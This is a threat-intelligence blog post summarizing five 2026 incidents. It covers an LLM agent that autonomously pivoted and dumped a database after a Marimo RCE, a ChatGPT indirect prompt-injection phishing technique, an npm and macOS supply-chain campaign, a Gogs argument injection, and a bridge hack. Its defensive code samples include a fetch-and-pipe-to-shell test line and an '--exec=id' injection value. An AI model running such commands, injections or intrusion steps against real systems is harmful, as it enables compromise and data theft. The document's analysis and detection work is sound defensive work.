Dennis Kim

Posted on May 30

AI at the Wheel: When Hacking Stops Needing a Human

Five threats from late May 2026 mark an inflection point.

#ai #security #cybersecurity #web3

AI is crossing from a hacking tool to an autonomous operator that decides and acts on its own. A field analysis.

For two years, "AI in offensive security" mostly meant one thing: a faster human. Attackers used large language models to write phishing emails, draft malware, translate lures, or summarize stolen data. The model was a power tool. A human still held it.

A cluster of incidents disclosed in late May 2026 quietly broke that assumption. In at least one case, the human let go of the wheel — and the attack kept driving.

I publish an independent, OSINT-based CTI archive (TLP:GREEN), and over the past week I released five reports in four languages that, read together, sketch the same arc: AI is moving from a tool you point at a target to an operator that picks the target's locks by itself. Here is the field view.

The spectrum: tool → operator → attack surface

It helps to think of AI's role in an intrusion as a spectrum, not a switch.

AI as a tool — the model accelerates a human-run attack (phishing copy, malware scaffolding, cryptojacking automation). The judgment is still human.
AI as an autonomous operator — the model interprets live output and decides the next action with no human in the loop. The judgment is the model's.
AI as an attack surface — the trust users place in AI output becomes the thing being exploited. The model is the victim's blind spot.

Most of 2026's headlines still live in the first bucket. What makes this batch notable is that it spans all three — and includes the first credible public case of the second.

1. Marimo: the first AI-agent-driven intrusion

This is the headline. Sysdig's Threat Research Team documented an intrusion where a large language model agent autonomously ran the entire post-exploitation phase — what they described as the first "AI-agent-driven" intrusion they've recorded.

The entry point was a pre-authenticated RCE in an internet-exposed Marimo notebook (CVE-2026-39987, CVSS 9.3, now on the CISA KEV list). The flaw is almost embarrassingly clean: the /terminal/ws WebSocket endpoint skips authentication validation that its sibling endpoints perform, so a single unauthenticated request yields a full PTY shell.
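The class of bug is easy to picture as a route table where one entry forgot the check its siblings perform. The following is a minimal sketch of that pattern, not Marimo's actual code: the `Route` type, the token check, and the `/other/ws` sibling path are all hypothetical stand-ins, and only `/terminal/ws` comes from the advisory.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Route:
    path: str
    handler: Callable[[dict], str]
    requires_auth: bool


def is_authenticated(request: dict) -> bool:
    """Hypothetical check: a request counts as authenticated if it carries a token."""
    return bool(request.get("token"))


def dispatch(routes: Dict[str, Route], path: str, request: dict) -> str:
    """Run the handler for a path, enforcing auth only where the route asks for it."""
    route = routes[path]
    if route.requires_auth and not is_authenticated(request):
        return "401 Unauthorized"
    return route.handler(request)


def unauthenticated_routes(routes: Dict[str, Route]) -> List[str]:
    """Audit helper: list every path that can be reached without authentication."""
    return sorted(path for path, route in routes.items() if not route.requires_auth)


# "/other/ws" is an illustrative sibling endpoint, not a real Marimo path.
ROUTES = {
    "/other/ws": Route("/other/ws", lambda req: "session", requires_auth=True),
    # The gap: the terminal endpoint is registered without the auth requirement.
    "/terminal/ws": Route("/terminal/ws", lambda req: "PTY shell", requires_auth=False),
}
```

An audit like `unauthenticated_routes(ROUTES)` is the kind of check that would surface the odd one out before an attacker does.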

What happened after the shell is the point. An LLM agent ran a four-stage pivot:

Harvest two cloud credentials from the host.
Replay them through a Cloudflare Workers fan-out egress pool, then pull an SSH private key from AWS Secrets Manager.
Open eight parallel SSH sessions into a downstream bastion.
Dump an internal PostgreSQL database — schema and contents — in under two minutes.

The whole chain, from initial access to exfiltration, finished in under an hour. The agent branched on the output of each command, retried failed paths while keeping context, and selected the exact secret it needed. That is human-grade judgment fused with machine-grade speed.

The uncomfortable implication for defenders: a patch blocks the entry, not the operating speed. A sub-two-minute database dump structurally outruns the average human SOC response window. The unit of response moves from minutes to seconds.
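To make "seconds, not minutes" concrete, here is a rough sketch of the kind of runtime rule that can react without waiting for an analyst: a sliding-window counter that flags a source opening too many sessions too quickly, such as the eight parallel SSH sessions above. The class name, the threshold of four sessions, and the ten-second window are my assumptions for illustration, not values from the Sysdig report.

```python
from collections import defaultdict, deque
from typing import Deque, Dict


class BurstDetector:
    """Flags a source that opens more than max_sessions within window_seconds."""

    def __init__(self, max_sessions: int = 4, window_seconds: float = 10.0) -> None:
        self.max_sessions = max_sessions
        self.window_seconds = window_seconds
        self._events: Dict[str, Deque[float]] = defaultdict(deque)

    def observe(self, source: str, timestamp: float) -> bool:
        """Record a new session; return True when the source should be contained."""
        events = self._events[source]
        events.append(timestamp)
        # Drop sessions that have aged out of the window.
        while events and timestamp - events[0] > self.window_seconds:
            events.popleft()
        return len(events) > self.max_sessions


detector = BurstDetector(max_sessions=4, window_seconds=10.0)
# Eight sessions opened 250 ms apart from the same (illustrative) address.
verdicts = [detector.observe("10.0.0.5", i * 0.25) for i in range(8)]
```

In this run the fifth session trips the rule. In practice the return value would feed an automatic containment action rather than a ticket queue.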

2. ChatGPhish: when the AI's trust is the payload

If Marimo is "AI as operator," ChatGPhish (disclosed by Permiso Security) is "AI as attack surface" — and it requires no code execution at all.

The mechanism is indirect prompt injection through a renderer trust gap. When a user asks ChatGPT to summarize a web page, the chatgpt.com renderer trusts the Markdown links and images that came from that untrusted third-party page as if they were the assistant's own output. It auto-fetches the images and renders the links as live, clickable elements inside the trusted UI.

That yields three primitives: UI-redress phishing links that look like ChatGPT's own answer, spoofed "account security" alerts wearing the assistant's visual trust, and a QR-code pivot rendered from an attacker bucket that bypasses every desktop URL defense (the destination only resolves after you scan it on a second device). Even the auto-fetched images alone leak the victim's IP, User-Agent, and Referer.

No memory corruption. No privilege escalation. The single fact that the renderer does not distinguish the assistant's own output from content carried in from an external page is enough to enable phishing, reconnaissance, and a device pivot. As of disclosure, the vendor had replied "could not reproduce," so treat the issue as unpatched and live.
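One way to picture closing that trust gap is to neutralize links and images in third-party content before anything renders them. The sketch below is my own illustration, not the vendor's fix or Permiso's recommendation; the function names and the simplified regexes are assumptions, and real Markdown parsing has more edge cases than two patterns can cover.

```python
import re

# Simplified patterns for inline Markdown images and links (an assumption:
# reference-style links, HTML tags, and nested brackets are not handled).
IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
LINK = re.compile(r"(?<!!)\[([^\]]+)\]\(([^)\s]+)[^)]*\)")


def defang(url: str) -> str:
    """Make a URL non-clickable so it can be shown for review."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def neutralize_markdown(untrusted: str) -> str:
    """Remove images entirely and turn links into plain, defanged text."""
    # Images first: they would otherwise be auto-fetched by the renderer.
    text = IMAGE.sub(lambda m: f"(image removed: {m.group(1) or 'no alt text'})", untrusted)
    # Links next: keep the label, show the destination in inert form.
    return LINK.sub(lambda m: f"{m.group(1)} (link not rendered: {defang(m.group(2))})", text)


page = (
    "Verify your account [here](https://evil.example/login) "
    "![qr](https://bucket.example/qr.png)"
)
safe = neutralize_markdown(page)
```

The point of the design is that nothing from the untrusted page gets fetched or becomes clickable inside the trusted UI; the reader still sees that a link existed and where it pointed.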

The lesson generalizes well beyond one product: AI output must be the start of verification, not the end of trust.

3. JINX-0164: the AI-era trust chain, end to end

JINX-0164 (named by Wiz) is a financially motivated cluster targeting crypto organizations on macOS since at least mid-2025. Its kill chain reads like a tour of every trust relationship a developer depends on:

A LinkedIn "recruiter" builds rapport, then sends a fake meeting link.
The victim installs a macOS payload masquerading as coreaudiod (saved as ChromeUpdater, persisted via launchctl): AUDIOFIX, a Python infostealer, plus MINIRAT, a Go backdoor.
The actor then moves laterally to CI/CD and code-distribution infrastructure, treating the developer laptop as a springboard, not a destination.
It has also trojanized the npm package @velora-dex/sdk (3 lines appended to dist/index.js that fetch a shell script delivering MINIRAT on import).
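The npm step suggests a cheap heuristic: look at the tail of a package's built entry file for code that both spawns a process and reaches out to the network. This is a rough sketch under my own assumptions. The patterns are generic guesses, not IOCs from the Wiz report, and the sample payload is invented for the test. It will miss obfuscated code and can flag legitimate build tooling.

```python
import re
from typing import List, Tuple

# Generic indicators (assumptions, not published IOCs).
SPAWN = re.compile(r"child_process|\bexec(Sync)?\s*\(|\bspawn(Sync)?\s*\(")
FETCH = re.compile(r"\bcurl\b|\bwget\b|https?://")


def suspicious_tail(source: str, tail_lines: int = 10) -> List[Tuple[int, str]]:
    """Return (line number, text) pairs from the file tail when it contains
    both a process-spawn indicator and a network-fetch indicator."""
    lines = source.splitlines()
    start = max(0, len(lines) - tail_lines)
    tail = list(enumerate(lines[start:], start=start + 1))
    spawns = [(n, text.strip()) for n, text in tail if SPAWN.search(text)]
    fetches = [(n, text.strip()) for n, text in tail if FETCH.search(text)]
    if spawns and fetches:
        return sorted(set(spawns + fetches))
    return []


clean = "exports.swap = function () { return 1; };\n"
# Invented three-line payload standing in for the appended code.
tampered = clean + (
    'const cp = require("child_process");\n'
    'const u = "https://example.invalid/x.sh";\n'
    'cp.exec("curl -s " + u + " | sh");\n'
)
hits = suspicious_tail(tampered)
```

Diffing a published tarball against the repository's build output is a stronger check; this kind of scan is only a fast first pass in CI.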

The TTPs overlap with North Korean clusters (BlueNoroff, Contagious Interview, UNC1069), but Wiz found no infrastructure overlap and stopped short of state attribution. That ambiguity is itself the signal: as DPRK tradecraft gets commercialized and imitated, "who did it" matters less than "which trust was abused" — recruitment trust, package trust, dev-infrastructure trust.

4. Gogs: the old-school flaw that still wins

Not every threat is exotic, and Gogs is the reminder. Rapid7 disclosed an RCE chain (their rating: CVSS 9.4, no CVE yet) in the self-hosted Git service's "Rebase before merging" operation. A malicious branch name injects the --exec flag into git rebase, running an arbitrary shell command on the server. Any authenticated user can trigger it, and on a default install that bar is low: an outsider can register, create a repo, flip one setting, and own the box solo, with cross-tenant access to everyone else's private repos.
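The mechanics are worth seeing in miniature. The sketch below builds argument lists only and never runs git; it is not the Gogs code or its eventual fix. The function names, the allowlist pattern, and the `refs/heads/` prefixing are my assumptions about one reasonable way to keep a user-supplied name from being parsed as an option.

```python
import re
from typing import List

# Allowlist (an assumption): must start with an alphanumeric, so never with "-".
SAFE_BRANCH = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]*")


def naive_rebase_argv(branch: str) -> List[str]:
    """Vulnerable pattern: the branch name lands where git parses options."""
    return ["git", "rebase", branch]


def checked_rebase_argv(branch: str) -> List[str]:
    """Reject option-like names and pass a fully qualified ref instead."""
    if not SAFE_BRANCH.fullmatch(branch):
        raise ValueError(f"refusing suspicious branch name: {branch!r}")
    # A ref that starts with "refs/heads/" cannot be mistaken for a flag.
    return ["git", "rebase", "refs/heads/" + branch]


# With the naive builder, a crafted name becomes a flag in the argument list.
injected = naive_rebase_argv("--exec=id")
```

Here `injected` is `["git", "rebase", "--exec=id"]`, which git would read as an instruction to run a command, while `checked_rebase_argv("--exec=id")` raises before anything reaches a shell.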

It was reported to the maintainer on 2026-03-17 and remained unpatched at the time of writing, while a public Metasploit module automates the whole chain against Linux and Windows. About 1,141 instances are directly exposed to the internet.

It's a textbook argument injection — trusting user input in a shell argument. The reason it belongs in this list: self-hosted Git is the single trust anchor for source code, deploy keys, and CI tokens. In an era of supply-chain-first attackers (see JINX above), an unpatched Git server is a bridgehead. Interim mitigations until a patch lands: DISABLE_REGISTRATION = true and MAX_CREATION_LIMIT = 0 in app.ini, plus removing internet exposure.
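If you manage more than one instance, the two interim settings are easy to check mechanically. The following is a small sketch using Python's standard configparser. It searches every section for the keys rather than assuming where they live, since section layout varies across Gogs versions; the `[auth]` and `[repository]` headers in the sample are my assumption, as are the function name and the `__root__` placeholder section.

```python
import configparser
from typing import Dict, List

# The two interim mitigations named above, with the values they should have.
EXPECTED: Dict[str, str] = {"DISABLE_REGISTRATION": "true", "MAX_CREATION_LIMIT": "0"}


def missing_mitigations(ini_text: str) -> List[str]:
    """Return the mitigation keys that are absent or set to a different value."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep key case exactly as written in app.ini
    # app.ini may begin with keys outside any section; give them a placeholder one.
    parser.read_string("[__root__]\n" + ini_text)
    found: Dict[str, str] = {}
    for section in parser.sections():
        for key, value in parser.items(section):
            if key in EXPECTED:
                found[key] = value.strip().lower()
    return sorted(key for key, want in EXPECTED.items() if found.get(key) != want)


# Sample config; the section names here are illustrative only.
sample = (
    "RUN_MODE = prod\n"
    "[auth]\nDISABLE_REGISTRATION = true\n"
    "[repository]\nMAX_CREATION_LIMIT = -1\n"
)
gaps = missing_mitigations(sample)
```

For the sample above, `gaps` names `MAX_CREATION_LIMIT` as the setting still to fix. A check like this does not replace removing internet exposure; it only confirms the config says what you think it says.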

5. KelpDAO LayerZero bridge hack: the off-chain single point of failure

The Web3 entry rounds out the picture. The KelpDAO LayerZero bridge compromise is a study in how cross-chain security fails not in the smart contracts everyone audits, but in the off-chain verification infrastructure that quietly underpins them.

When the integrity of a bridge depends on an off-chain verifier — a relayer, an oracle, a signing service — that component becomes a single point of failure. Compromise it, and asset theft follows directly, no on-chain exploit required. It's the same structural theme as the rest of this list: the riskiest dependency is the trusted component nobody is watching, whether that's an analytics notebook, an AI renderer, an npm package, a Git server, or an off-chain verifier.
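The "single point of failure" claim can be stated as a toy model: if a message is accepted once a threshold of verifiers approves it, a threshold of one over one verifier means a single compromise is enough. This is a deliberately abstract sketch, not a description of the KelpDAO or LayerZero configuration; the verifier functions, the `valid:` prefix rule, and the 2-of-3 comparison are all invented for illustration.

```python
from typing import Callable, Sequence

Verifier = Callable[[bytes], bool]


def accept_message(message: bytes, verifiers: Sequence[Verifier], threshold: int) -> bool:
    """Accept a cross-chain message when at least `threshold` verifiers approve it."""
    if not 1 <= threshold <= len(verifiers):
        raise ValueError("threshold must be between 1 and the number of verifiers")
    approvals = sum(1 for verify in verifiers if verify(message))
    return approvals >= threshold


def honest(message: bytes) -> bool:
    """Stand-in for a real check: only messages with the expected prefix pass."""
    return message.startswith(b"valid:")


def compromised(message: bytes) -> bool:
    """An attacker-controlled verifier approves everything."""
    return True


forged = b"forged: release funds"
single = accept_message(forged, [compromised], threshold=1)
quorum = accept_message(forged, [compromised, honest, honest], threshold=2)
```

With one verifier the forged message is accepted; with a 2-of-3 quorum the same compromise is not sufficient on its own. The model says nothing about how the real incident unfolded, only why an unwatched off-chain component carries so much weight.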

The through-line

Put the five side by side and the pattern is hard to miss. Four of them are about trust — the trust we extend to AI output, to recruiters, to packages, to self-hosted infrastructure, to off-chain verifiers. One of them, Marimo, adds the new variable: autonomy at machine speed.

That combination is what makes the 2026 inflection real. We are leaving the world where AI was a faster pen for the attacker, and entering one where AI can be the attacker, the attack surface, or both in the same incident. Distributed egress, adaptiveness, and second-level speed are no longer advanced tradecraft — they're becoming default features of the threat.

My own framing hasn't changed, and this batch reinforces it: an LLM is a spreadsheet, not an oracle. It is astonishingly powerful as an instrument and catastrophic as an unverified authority — and that is exactly the line attackers are now operating along. The defensive starting point is symmetric:

Reduce exposure and isolate credentials, so the value of entry drops.
Add behavioral runtime detection and automatic containment, so the speed of operation can't outrun you.
Treat every AI output — and every trusted dependency — as the start of verification, not the end of it.

Read the full reports

Each of these five is written up in depth (attack chains, IOCs, detections, mitigations, and a Korea-context assessment), published as TLP:GREEN and available in English, Korean, Japanese, and Chinese. The archive also tracks the broader 2026 trend lines — DPRK clusters, supply-chain attacks, AI/LLM security, and Web3 incidents.

👉 Full index and reports: CYBER-THREAT-INTELLIGENCE-REPORT (README, EN)

If you run exposed notebooks, self-hosted Git, crypto dev pipelines, or AI-assisted research workflows, the Marimo, Gogs, JINX-0164, ChatGPhish, and KelpDAO write-ups are the ones to start with.

Independent CTI archive · OSINT-based · TLP:GREEN. Feedback and corrections welcome via the repository's issues.
